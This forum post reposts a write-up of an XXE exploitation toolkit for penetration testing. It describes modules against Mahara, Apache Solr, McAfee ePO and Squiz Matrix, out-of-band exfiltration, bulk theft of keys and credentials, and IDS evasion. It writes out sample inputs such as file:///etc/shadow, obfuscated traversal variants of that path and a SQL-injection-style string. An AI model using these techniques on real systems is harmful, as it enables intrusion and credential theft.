Jump to content
Fi8sVrs

XXE Vulnerability Exploitation

Recommended Posts

  • Active Members

OT01-OTORI-01-Diagrams-01-Diagram-ePO.JPG

Basic XXE attack (McAfee ePO)

OT01-OTORI-01-Diagrams-02-Diagram-Mahara.JPG

Advanced XXE attack (Mahara)

Certain versions of McAfee ePolicy Orchestrator are vulnerable to the most straightforward sort of XXE issue. In the first illustration, the attacking system causes an ePO dashboard to be created. Because of the XXE technique, the ePO server inserts the contents of its own db.properties file into the dashboard's description. The attacking system is then able to view the contents of that file by reading the description of the dashboard as displayed in the ePO web interface.

The second — much more complicated — series of diagrams illustrates the basic concept described by Timur Yunusov and Alexey Osipov in their whitepaper on out-of-band XXE techniques and the slides from the corresponding BlackHat EU 2013 presentation.

In short, the vulnerable Mahara CMS is tricked into sending the contents of a sensitive file to a malicious webserver acting on behalf of the attacker.

For more technical readers, the out-of-band data is generally base64-encoded — among other things, this allows for binary data to be retrieved.

On The Outside, Reaching In is a Python-based toolbox intended to allow useful exploitation of XML external entity ("XXE") vulnerabilities.

In the current release, it has two major functions:

  1. Read certain categories of file via the target system (either from the target's filesystem, or via HTTP calls to other systems accessible to the target).
  2. Trigger memory-exhaustion denial-of-service conditions in certain vulnerable targets.

In the future it may be extended to enable similar functionality for the general class of local and remote file-inclusion vulnerabilities. See Future Releases and Planned Features.

Conceptually, it is similar to the Metasploit Framework: provide a package of related exploits based around a common core which allows new exploits of similar types to be quickly developed because so much of the code is reusable. The specifics of exploitation are significantly different, however.

XML (External) Entity Vulnerabilities

(This is a brief summary - for a detailed explanation, see OWASP's XML External Entity (XXE) Processing and Microsoft's XML Denial of Service Attacks and Defenses.)

XML (a widely-used — especially in so-called "enterprise" software — markup language) contains a feature called an "entity", which is basically a placeholder (or, for developers, a constant) that is defined once and then referenced later in the document. For example, if I am writing a boilerplate contract, I can define an entity named &companyname; with the value Spectre Security Products at the beginning of the document, and then use &companyname; wherever the contract would normally contain the actual company name (Spectre Security Products). When I have need for an identical contract for a different company (Universal Exports), I update the definition of &companyname; at the beginning of the document, and my work is finished.

This type of entity can be misused in several XML libraries to cause the target system to run out of memory — the specific techniques are frequently known as "Billion Laughs", and the "Quadratic Blowup". Both of these are described in detail in the OWASP and Microsoft documents. I am generally uninterested in denial-of-service attacks, but included the capability in On The Outside, Reaching In because it was nearly "free" in terms of development effort and may be useful in certain cases.

Where XML entites become interesting (in my opinion) is that the specification also defines what's called an "external entity". As the name implies, this is a reference to information which is stored outside of the XML document. Perhaps the author wants to refer to an image or a table of data maintained by someone else, and this extension of the entity concept allows that to take place, rather than copying the information into the new document.

This aspect of the XML specification frequently results in behaviour which is unexpected by the developers using XML libraries, partly because XML has been used for so many types of application in the last 10+ years. Numerous web applications and services receive commands and requests formatted as XML documents. Many of them will internally parse the XML document (which, among other things, usually involves "entity expansion" - replacing the placeholders with the actual value defined for them) and then take action based on the parsed version of the data.

For example, perhaps I have written a web-based document library which allows content to be uploaded in the form of XML files. This library receives the files, resolves any entities, and then stores the result for viewing via web browser. But what if one of the entities is a reference to the external file /etc/shadow, and I have made the mistake of configuring the application to run as the root user? If I (the developer) have not designed my system with security in mind, the browsable version of the document now contains a list of all of the user accounts on the system and their password hashes. The first illustration above is of this type of scenario.

Nearly every XML library allows for this kind of inclusion of files by exact name. This is still very useful to an attacker, but requires the target file's path to be known or guessed. The Java XML library goes one step further and actually allows directory contents to be listed by the same means, so vulnerable applications written in Java can be used to obtain nearly all of the text-based files from the target system.

This type of vulnerability has been understood since 2002 or earlier, but is still surprisingly common — possibly because of the lack of useful automated tools for exploiting such vulnerabilities.

Some vulnerabilities require much more complicated techniques to exploit. The second illustration above shows the most elaborate method used by the initial release of On The Outside, Reaching In. It involves working together with an instance of She Wore A Mirrored Mask to perform Yunusov-Osipov-style data exfiltration[2].

Practical And Useful XXE Exploitation

Traditionally, XXE exploitation has generally involved single files (the most common example being /etc/passwd as a proof-of-concept of a vulnerability on a Linux or Unix system). While this can be very useful, I believe that realizing the full potential of XXE necessarily involves automation to obtain as many potentially-valuable files from the target system as possible.

In the case of Linux and Unix, the culture of that world is such that administrators will often put sensitive, valuable data in text files protected only by filesystem permissions:

  1. Database credentials and/or connection strings.
  2. SSH private keys.
  3. TLS/SSL certificates and their private keys.
  4. Lists of valid usernames
  5. Configuration files
  6. System information (from /proc)
  7. Information about installed software and other components (which may reveal vulnerabilities)

Even if the filesystem permissions are correct (which in my experience is rarely the case), if a PHP-based web application is running as a specific non-privileged account, that account will still almost always have read access to the file containing its own database connection information (including the password).

On The Outside, Reaching In provides the ability to take full advantage of this concept in the form of its --clone mode. Grab all the files you can, and then use grep or your favourite tool to search for information that will reveal further vulnerabilities.

Because XML external entities are referenced in the form of URIs, then the potential is there to not only access content from the target server's filesystem, but to use that target server as a reverse HTTP proxy into the environment that is hosting it (as well as any HTTP-based services running on the target server's loopback address or blocked from direct connectivity by a firewall). In other words, instead of specifying file:///etc/passwd for the external entity, imagine the possibilities for URIs like http://127.0.0.1:8080/servlet/SnoopServlet, https://intranet.local/confidential/blueprints/DeathStar.dwg, or ftp://ftp.local/bank_account_list.txt, when those URIs are accessed not by the attacker's system (which hopefully has no network level access to any of them), but by the exposed server with an XXE vulnerability, which is on the same (hypothetical) network that those sensitive internal URIs are pointing to.

On The Outside, Reaching In can access intranet URIs of that type today, as long as the full paths are known. A feature is planned for a future release which would allow it to function as an HTTP proxy for web browsers and other HTTP-based pen-testing tools. This would allow interactive browsing and spidering of that content as well.

Current Modules

The current release of On The Outside, Reaching In includes the following modules:

  • CVE-2012-2239 - Mahara 1.4.x before 1.4.4, and 1.5.x before 1.5.3 (dependent on libxml2 version as well)
    All modules involve pointing an RSS feed-reader object to a malicious RSS feed hosted using She Wore A Mirrored Mask, and exfiltrate data using a Yunusov-Osipov out-of-band technique[2].
    Valid Mahara credentials are required. In most cases, even standard user credentials should be sufficient (in other words, administrative credentials will work, but should not be required).
    Mahara is a PHP-based application, so it is possible to obtain binary files as well as text, although on most systems the maximum file size that can be retrieved is about 2KiB. Larger files will not be returned.
    To my knowledge, On The Outside, Reaching In was the first public source of working exploit code for this vulnerability.
    In early June 2014, libxml2 was updated in a way that prevents this set of modules from working. For example, 2.7.8.dfsg-5.1ubuntu4.6 will allow these modules to function, but 2.7.8.dfsg-5.1ubuntu4.8 will not.
    • CVE-2012-2239-ME - Modify the configuration of an RSS feed-reader on an existing page, then attempt to reset it to its original state once exploitation is complete. (1.4.3 and 1.5.2) [ Module created: 2014-03-22 ]
    • CVE-2012-2239-PC-A - Create a new page (using administrative credentials), and attempt to delete it when exploitation is complete. (1.4.3 only for now) [ Module created: 2014-03-22 ]
    • CVE-2012-2239-PC-U - Create a new page (using standard user credentials), and attempt to delete it when exploitation is complete. (1.4.3 only for now) [ Module created: 2014-03-22 ]

See OTORI - Example 3: Mahara for a detailed tutorial regarding these modules.

  • CVE-2013-6407 - Apache Solr (note: CVE-2013-6408 arguably also applies in some cases)
    Three distinct vulnerabilities are exploited, giving pen-testers maximum flexibility if the system administrator has disabled access to some functionality.
    Valid Solr credentials are not required.
    Solr is a Java-based application, so only ASCII text can be retrieved. In addition, due to the specifics of the vulnerabilities, ASCII text which contains XML/HTML markup cannot be retrieved. There does not appear to be a practical limit on the size of files which can be obtained.
    To my knowledge, On The Outside, Reaching In was the first public source of working exploit code for these vulnerabilities.
    • CVE-2013-6407-DARH - for Solr versions up to and including 4.3.0. Submits a crafted XML document for analysis (not storage), with the XXE-based content being immediately reflected back in the response from the server. This is the fastest Solr-related module, and works with the largest number of versions. This should be the preferred Solr-exploitation module unless the system administrator has disabled access to the Document Analysis Request Handler or it is paramount to avoid leaving error messages in the Solr log files. [ Module created: 2014-02-15 ]
    • CVE-2013-6407-URH-DI - for Solr versions up to and including 4.0.0. Inserts a crafted document into the Solr index, queries Solr to retrieve the document content (which contains the XXE-based data), then attempts to delete that document. This is the slowest Solr-related module. It is the least likely to generate potentially-suspicious error messages in the Solr logs. [ Module created: 2014-02-15 ]
    • CVE-2013-6407-URH-NMVF - for Solr versions up to and including 4.0.0. Attempts to insert a crafted document into the Solr index, but the document is designed to violate a constraint against a particular field containing multiple values. The insert will fail, and the XXE-based content is immediately reflected back in the server response. [ Module created: 2014-02-15 ]

See OTORI - Example 1: Apache Solr for a detailed tutorial regarding these modules.

  1. The maximum file size which can be retrieved is around 1KiB. Larger files will be truncated, and will contain a chunk of the dashboard definition appended to the actual content.
  2. The first four characters of each file will be replaced with the fifth through eighth characters of the same file.

This vulnerability was disclosed by RedTeam Pentesting GmbH, and this module uses a method similar to the one in their example code.

  • CVE-2014-2205-D - Uploads a crafted dashboard definition whose Description field contains the XXE exploit, views the dashboard, then attempts to delete it. [ Module created: 2014-05-26 ]

See OTORI - Example 4: McAfee ePO for a detailed tutorial regarding this module, including a walkthrough of how to obtain the ePO database credentials.

  • SOS-12-007 - Squiz Matrix prior to version 4.6.5/4.8.1 (note: only tested with version 4.6.3))
    All modules involve making crafted requests (requests for an asset map, by default) to the Squiz instance. She Wore A Mirrored Mask is required for all three, because the vulnerability is triggered using a Yunusov-Osipov technique (entities nested via external XML fragment references)[2].
    Valid Squiz Matrix credentials are not required.
    Squiz Matrix is a PHP-based application, so it is possible to obtain binary files as well as text, although on most systems the maximum file size that can be retrieved is about 2KiB. Larger files will not be returned.
    This vulnerability was disclosed by Nadeem Salim from Sense of Security Labs, and this module uses a method similar to the one in Nadeem's example code.

  • SOS-12-007-YU-404 - Makes a request referring to a non-existent page. The XXE-based content is reflected back in the response. [ Module created: 2014-03-16 ]
  • SOS-12-007-YU-IU - Makes a request involving an invalid URI. The XXE-based content is reflected back in the response. [ Module created: 2014-03-16 ]
  • SOS-12-007-YU-OOB - Makes a valid request, with the XXE-based content being exfiltrated using a Yunusov-Osipov out-of-band technique[2]. This is the most reliable and most flexible of the Squiz Matrix modules. The other two are included mainly for tutorial purposes, although they may be able to retrieve slightly larger (a few bytes) files in some edge cases. [ Module created: 2014-03-16 ]

See OTORI - Example 2: Squiz Matrix for a detailed tutorial regarding these modules.

Known Limitations

In the interest of making a potentially-useful tool available sooner rather than later, the current release of On The Outside, Reaching In is a preview which has significant missing functionality compared to the intended "feature-complete" alpha release of the shiny chrome-plated future:

  • Ten working exploits for one commercial product (McAfee ePO 4.6.0 - 4.6.7) and three open-source software packages (Apache Solr, Squiz Matrix, and Mahara) are included. Eventually this number should be far higher.
  • No exploits for systems using Microsoft's XML libraries (SharePoint, etc.) are included (yet). SharePoint itself included a gaping XXE vulnerability up until 2011 (see MS11-074 for details). However, while it's so easy to exploit by hand that even a child could almost do it, trying to automate the process using raw HTTP requests reveals yet another case where beneath its simple-to-use surface, SharePoint is a daunting maze of unexpected complexity.
  • Built-in support for the use of an explicit HTTP proxy is not included. However, you can use tools like proxychains to connect through a proxy. I recommend proxychains-ng / proxychains4, which I have tested successfully for this purpose (specifically, version 4.7).
  • Built-in support for HTTP authentication is not included. If you need to connect to a system configured for HTTP authentication, you can use proxychains-ng / proxychains4 to connect through Burp Suite, and configure Burp Suite to handle platform authentication.
  • While most of the requests sent across the network are designed to be randomized and therefore more difficult for IDS/IPS devices to detect, some of the content (especially more-recently-developed content) is somewhat predictable - in particular, the RSS feed used by the Mahara modules.
  • It has been tested only on Linux (specifically, Debian 7 x64 and Kali Linux 1.0 x64).
  • It has been tested only using Python 2.7.3 (the current default on both test platforms). I briefly tried using it under Python 2.6.5 (the "current" version on my BackTrack 5 VM), and it failed to run due to some of the string-formatting code.
  • It pretends it is capable of HTTP 1.1 requests, but does not support connection re-use.
  • This software has not been tested with IPv6.

In addition, each flavour of XML library as well as the vulnerable software introduces its own limitations on the capabilities of this type of tool.

  • Java-based systems typically allow directories to be enumerated, and the included Apache Solr module allows this to be exploited. Although the filesize for content retrieved via this module is effectively unlimited, only text files with no XML markup can be retrieved due to the XML schema which Solr uses.
  • PHP-based vulnerable systems typically allow binary content to be retrieved (because PHP includes a handy (for attackers) function that base64-encodes such data), but the maximum file size is typically about 4K unless it was built with customized compiler flags.

Why a New Tool?

Initially, I had planned on building this functionality as a set of auxiliary modules for Metasploit. While I am a big fan of Metasploit and use it frequently, I quickly discarded this idea.

Metasploit's core purpose (at least in my mind) is remote code-execution on target systems. While it can do other things, the further away any tool gets from its primary function, the less effective and harder to maintain it will become, in my experience.

Basic XXE exploitation can be done using a client/server model, but many systems (especially PHP-based systems) require the use of techniques like those described by Timur Yunusov and Alexey Osipov[2], where a third system is necessary to "bounce" parts of the exploit and exfiltrated data off of. This could potentially be emulated or approximated using Metasploit, but it would be difficult and probably not make me any friends among Metasploit's developers. For a tool written and used by hackers, Metasploit sure does have a lot of rules regarding contributions.

Metasploit Wiki - 2014-05-10

OT01-OTORI-03-MS-Metasploit_Contribution_Wiki.JPG

Guidelines for Accepting Modules and Enhancements

Even if the Metasploit developers welcomed this type of functionality with open arms, the flexibility of having the "co-conspirator" service (in this case, She Wore A Mirrored Mask) be decoupled from the main attack tool provides much more flexibility:

Example Attack Configurations

OT01-OTORI-04-Attack_Configurations-01-Basic_OOB.JPG

Basic OOB

OT01-OTORI-04-Attack_Configurations-02-Separate_Systems.JPG

Separate Systems

OT01-OTORI-04-Attack_Configurations-03-Master_Plan.JPG

Master Plan

A few examples of possible ways to deploy the two components necessary for an out-of-band XXE attack.

Finally, I feel like it's been too long since any significant new general-purpose security tools were released. Maybe everyone is chasing bug bounties instead of showing how individual flaws can be combined to compromise entire organizations?

Why Are You Reinventing The Wheel?

At first glance it might seem like I've reinvented the wheel in some places. Why did I make a new library called libdeceitfulhttp instead of using the standard Python httplib library? Why didn't I borrow mitmproxy so I would have proxy functionality already?

Unfortunately, while httplib is very useful for most Python-based HTTP clients and servers, it has some very significant limitations when it comes to generating and handling traffic that is intended to mimic as closely as possible traffic from other systems, or which intentionally does not comply with standards in the interest of revealing or taking advantage of security flaws.

The main issue I ran into early on is that httplib rigidly adheres to certain aspects of the protocol and does not allow for a way to override that functionality. A simple example is that not only will it only accept an HTTP version of 1.0 or 1.1, its creators chose to represent those values as 0 and 1. Want to work with a client that expects something unusual like 0.9, intentionally leave out the version entirely, or see what happens if you send an HTTP -37.7' OR 1=1 OR '12 request to a server? Well, you're out of luck.

Presumably in the interest of making the library easier to work with quickly, other design decisions were also made. The set of headers for a request is represented as a hashtable (sorry, "dictionary") indexed by header name. This immediately prevents interesting requests from being sent where the same header name is included multiple times with different values, to see if e.g. one tier within the target environment will interpret the first value, while another will use the second value.

Making things worse (from an accuracy perspective), the hashtable keys are normalized to all-lowercase. This means that if I am writing (for example) an iOS application and a corresponding web API, I can easily detect the presence of a Python-based intermediate system by sending a request header such as X-HaRD-tO-reaD-heADEr: canary and see if the server receives that request unchanged, or if it has been normalized to x-hard-to-read-header: canary, X-Hard-To-Read-Header: canary, etc.

mitmproxy seems like a very well-written piece of software, but as far as I can tell it is based on httplib, and so brings those limitations along.

The next major hurdle to overcome for On The Outside, Reaching In and She Wore A Mirrored Mask is to rebuild libdeceitfulhttp as a 1:1 replacement for httplib, in which the two main differences are that every parameter is a string (allowing for maximum, dangerous flexibility), and that the headers are represented as a list of tuples with some utility functions to handle accessing them by name.

Future Releases and Planned Features

Some of the things I'd like to include in future releases (not in any particular order):

  • Completely replace the use of httplib with the pen-testing-friendly equivalent discussed above.
  • Automatically launch a basic SWAMM instance to streamline the most common use of that tool.
  • URI-specific basic IDS/IPS signature evasion. For example, if the current URI to be requested is file:///etc/shadow, then randomly transform it into something like file:///etc/default/../shadow, file:///var/tmp/../log/../etc/default/../shadow, or file:///var/tmp/%2e%2e/log/%2e.%2fetc/default%2f2e./%73%68%61%64%6f%77.
  • The optional ability to specify module options using name/value pairs instead of the current position-based system.
  • Variable support for URI lists (e.g. a list is provided of the content of a typical Apache Tomcat directory structure, it begins with file:///%BASEPATH%/, and at runtime the value for that value is specified so the user doesn't have to generate their own list file every time).
  • Filtered view of modules based on search or other criteria (e.g. what functionality the module supports).
  • Separate groupings of modules for mainline, community-contributed, and user-developed (to avoid stomping on users' files when they upgrade).
  • An option to profile the target (attempt to determine the OS, system specs, etc.).
  • Correct HTTP 1.1 operation (pipelining, etc.).
  • Native proxy support.
  • Authentication (NTLM, Kerberos, etc.) for both webservers and proxies.
  • Fix the --noemptydirs option so that it works as expected in --exacturilist mode.

Source

  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...